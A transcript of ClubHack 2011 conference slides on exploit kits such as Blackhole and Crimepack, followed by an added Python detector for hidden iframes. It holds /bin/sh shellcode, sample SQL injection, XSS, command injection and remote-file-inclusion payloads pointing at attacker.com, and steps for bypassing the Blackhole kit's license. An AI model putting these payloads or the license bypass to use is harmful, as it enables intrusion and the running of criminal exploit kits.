Exploit the Exploit Kits (Dhruv Soi)

ClubHack 2011 Hacking and Security Conference.
Talk - Exploit the Exploit Kits
Speaker - Dhruv Soi

  1. Exploit The Exploit Kits
     Presented By: Dhruv Soi
     Chief Mentor @ Hacker Distinct Objects
     Director @ Torrid Networks
     Chair @ OWASP India
     http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  2. Disclaimer
  3. Agenda
     • #whoami
     • Segmentation Fault
     • #./exploit –mode Basics
     • AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     • #history; lastlog
     • ummm
     • #watch ‘demo –kits blackhole crimepack’
     • Boom!
     • #make –bypass License
     • Oops!
     • #shutdown -r now “Questions?“
     • Thank You
  5. Who am I?
     • Chief Mentor – HDO, Founder – Torrid Networks, Chair – OWASP India
     • Past Experience – Fidelity Investments, Tech Mahindra (iPolicy), Sopra Group, FCS
     • Speaker – NASSCOM, DSCI, CII, OWASP India, OWASP Taiwan, OWASP Portugal
     • Author – Linux For You, Benefit, IT Magazine, HNS, SearchSecurity
     • Organizer for OWASP Asia 2009 – Director - NTRO, CBI Director, US – White House Cyber Czar, Ex-CIA Director invited as Chief Guest
     • OWASP 2012 – Be Ready!
     • Expertise – None. Only passionate about InfoSec, just another learner!
  6. Basics of Exploitation
  7. Art of Exploitation
  8. Vulnerability to Exploitation
  9. Practical Exploitation
  10. Software Vulnerabilities @ Glance
     • Buffer Overflow
     • Format String
     • Code/File Injection
     • Privilege Escalation
     • Denial of Service
     Listed beside the bullets on the slide (x86 Linux execve("/bin/sh") shellcode in AT&T syntax):
         global code_start
         global code_end
         .data
         code_start:
             jmp 0x17
             popl %esi
             movl %esi,0x8(%esi)
             xorl %eax,%eax
             movb %eax,0x7(%esi)
             movl %eax,0xc(%esi)
         my_execve:
             movb $0xb,%al
             movl %esi,%ebx
             leal 0x8(%esi),%ecx
             xorl %edx,%edx
             int $0x80
             call -0x1c
             .string "/bin/shX"
         code_end:
  11. Application Vulnerabilities @ Glance
     • SQL Injection: ‘ OR 1=1--
     • Cross Site Scripting: <script>alert(“Hello”)</script>
     • File Inclusion: /index.php?page=http://www.attacker.com/attack.txt
     • Command Injection: /lookup.php|dir c:
     • Session Hijack
     • …
  12. Traditional Attack Scenario
     Identify Target → Port Scan → Vulnerability Identification → Exploit → Privilege Elevation → Access Resources → Replicate to other targets (worms)
  13. Attack Challenges
     • Identifying a user who is not on the internet (no public/static IP address)? LAN users
     • Attacking a user behind a firewall:
       • Network firewalls
       • Host-based firewalls
     • Patched machines, latest exploits (0-days)
     • Antivirus
     • Too much manual work - time is money!
  14. From Servers to Client
     • Identify the user from social networks, search engines, emails, address book, logs or behavior
     • Target client-side attacks:
       • Browser based (Mozilla, IE, Safari, etc.)
       • Adobe Reader
       • Adobe Flash
       • Sun Java
       • Media Players
     • The user needs to click the URL pointing to the hosted exploit:
       • Send an email
       • Insert it into his favorite website
  15. Client Side Vulnerabilities - Metasploit
     • Microsoft Windows WebDAV Application DLL Hijacker
     • Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
     • Microsoft Windows Shell LNK Code Execution (MS10-046)
     • Microsoft Help Center XSS and Command Execution (MS10-042)
     • Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
     • Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
     • Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
     • FireFox 3.5 escape Return Value Memory Corruption
     • Adobe PDF Embedded EXE Social Engineering
     • Firefox location.QueryInterface() Code Execution
     • Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
     • Mozilla Suite/Firefox Navigator Object Code Execution
     • Adobe Collab.getIcon() Buffer Overflow
     • Adobe Collab.collectEmailInfo() Buffer Overflow
     • Adobe Flash Player "newfunction" Invalid Pointer Use
     • Adobe Flash Player "Button" Remote Code Execution
     • Sun Java Calendar Deserialization Exploit
     • Sun Java JRE getSoundbank file:// URI Buffer Overflow
     • Sun Java JRE AWT setDiffICM Buffer Overflow
     • Too many exploits, too little time!
  17. Java Rhino: CVE-2011-3544, Java Applet Rhino Script Engine Remote Code Execution
  20. Demonstration Time…
  21. Source: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino
  23. Exploit Kits
     • PHP, MySQL, a list of exploits, obfuscated code
     • Centralized console – dashboards
     • Generates an iFrame
     • Sends exploits automatically to the victim's browser when the website carrying the iFrame is visited
     • Pushes the payload (bot, trojan, keylogger) to the victim’s machine on successful exploitation
     • Records the stats
     • OOPS! Antivirus evasion, scanning
     • All automated – sometimes it's good to be lazy!
  24. Blackhole & Crimepack
  25. Blackhole Exploits
     • Internet Explorer
       • CVE-2010-1885 HCP
       • CVE-2006-0003 IE MDAC
     • Adobe Software
       • CVE-2008-2992 Adobe Reader util.printf
       • CVE-2009-0927 Adobe Reader Collab GetIcon
       • CVE-2007-5659 Adobe Reader CollectEmailInfo
     • Java Software
       • CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll
       • CVE-2010-0840 Java Trusted Methods Chaining Remote Code Execution Vulnerability
       • CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
       • CVE-2010-0886 Java unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE
       • CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin
  26. Crimepack Exploits (the kit's exploit list: name, description, CVE)
     • name="mdac" desc="IE6 COM CreateObject Code Execution" CVE-2006-0003
     • name="aol" desc="AOL Radio AmpX Buffer Overflow" CVE-2007-5755
     • name="msiemc" desc="IE7 Uninitialized Memory Corruption" CVE-2010-0806
     • name="iexml" desc="Internet Explorer 7 XML Exploit" CVE-2008-4844
     • name="java" desc="JRE getSoundBank Stack BOF" CVE-2009-3867
     • name="firefoxdiffer" desc="Firefox 3.5/1.4/1.5 exploits" CVE-2009-355
     • name="iepeers" desc="IEPeers Remote Code Execution" CVE-2010-0806
     • name="libtiff" desc="Adobe Acrobat LibTIFF Integer Overflow" CVE-2010-0188
     • name="pdfexpl" desc="PDF Exploits [collectEmailInfo (CVE-2007-5659), getIcon (CVE-2009-0927), util.printf (CVE-2008-2992)]"
     • name="spreadsheet" desc="OWC Spreadsheet Memory Corruption" CVE-2009-1136
     • name="activexbundle" desc="Bundle of ActiveX exploits" CVE-2008-2463
     • name="opera" desc="Opera TN3270" CVE-2009-3269
  28. Crimepack
  29. Blackhole, hick hick!
  30. Whew! Demonstration Time...
  31. Exploit Kits in News
     • November 2, 2011: Blackhole Exploit Kit attack on WampServer & WordPress sites
     • October 13, 2011: Approximately 16,000 compromised pages are redirecting users to the site that's hosting the Nice Pack exploit kit
     • September 27, 2011: MySQL.com hacked to serve malware
     • May 17, 2011: Geek.com site hacked via Blackhole Exploit Kit
     • April 11, 2011: US Postal Service (USPS.gov) website victim of Blackhole exploit kit
     • May 05, 2010: U.S. Treasury website hacked using exploit kit
  32. There are just too many of those….
  33. Data Leakage, Even Exploit Kits!
     • May 22, 2011: First public release of BlackHole Exploit Kit!
     • May 14, 2011: Crimepack 3.1.3 exploit kit leaked, available for download!
     • May 13, 2011: 26 underground hacking exploit kits available for download!
     • April 14, 2011: Phoenix exploit kit 2.5 leaked, download now!
  34. Managed Hacking Services
     • Blackhole deal – I ain't their marketing guy!
       • Annual license: $1500
       • Half-year license: $1000
       • 3-month license: $700
       • Update FUD: $50
       • Changing domain: $20; multidomain: $200 to the license
       • During the term of the license all the updates are free
     • Rent on Blackhole servers:
       • 1 week (7 full days): $200
       • 2 weeks (14 full days): $300
       • 3 weeks (21 full days): $400
       • 4 weeks (31 full days): $500
       • 24-hour test: $50
  35. Obfuscated Code…
  36. Bypass License
     • The license is bound to an IP (public IP – IP1); the kit reads the IP from the HTTP headers and grants access
     • How about configuring your server with the IP address the kit was built for? – Routing issues?
     • Configure your own public IP on eth0 (IP2) and the exploit kit's licensed public IP on eth1 (IP1)
     • Configure Apache VirtualHost IP1:80 with the exploit kit path
     • Configure Apache VirtualHost IP2:80 with the mod_proxy module
     • Configure Apache mod_proxy to forward requests from IP2:80 to IP1:80
     • The kit thinks its license is in use since the requests arrive at IP1
  37. Protecting from Exploit Kits? Out of scope for now!
  38. We are hiring! Malware writers, exploit writers, onsite InfoSec trainers. Opportunity in South Africa.
  39. Questions? SANTA
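
The hidden-iFrame delivery described on slides 23 and 31, as an added detection example by the editor (not code from the talk or from any kit): a Python check that flags iframes a visitor would never see, the usual sign of an injected redirect to a kit's landing page. The sample page, the hostnames and the size/style heuristics are constructed and assumed for this example.

```python
# Added example (not from the ClubHack 2011 slides): flag hidden <iframe>
# injections of the kind exploit kits rely on: a frame the visitor never sees
# (zero size, display:none, far off-screen) that loads the kit's landing page.
# Sample HTML and host names below are constructed for this example.
from html.parser import HTMLParser
import re

_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
_OFFSCREEN = re.compile(r"(left|top)\s*:\s*-\d{3,}", re.I)

def _is_tiny(value):
    """True for a width/height attribute of 0 or 1 pixel (None/'' -> False)."""
    try:
        return int(str(value).rstrip("px")) <= 1
    except ValueError:
        return False

class IframeAuditor(HTMLParser):
    """Records every iframe that looks deliberately hidden from the visitor."""
    def __init__(self):
        super().__init__()
        self.findings = []  # (src, comma-joined reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        style = a.get("style") or ""
        reasons = []
        if _is_tiny(a.get("width")) and _is_tiny(a.get("height")):
            reasons.append("zero-size")
        if _HIDDEN_STYLE.search(style):
            reasons.append("hidden-by-style")
        if _OFFSCREEN.search(style):
            reasons.append("off-screen")
        if reasons:
            self.findings.append((a.get("src", ""), ",".join(reasons)))

def find_hidden_iframes(html):
    """Return (src, reason) for each iframe in html that looks injected."""
    auditor = IframeAuditor()
    auditor.feed(html)
    return auditor.findings

# Constructed sample: one legitimate embed followed by two injected frames.
SAMPLE_PAGE = """<html><body>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<iframe src="http://kit.example.invalid/in.php" width="0" height="0"></iframe>
<iframe src="http://other.example.invalid/x" style="position:absolute;left:-9999px"></iframe>
</body></html>"""
```

Calling find_hidden_iframes(SAMPLE_PAGE) reports only the two invisible frames; the visible video embed passes.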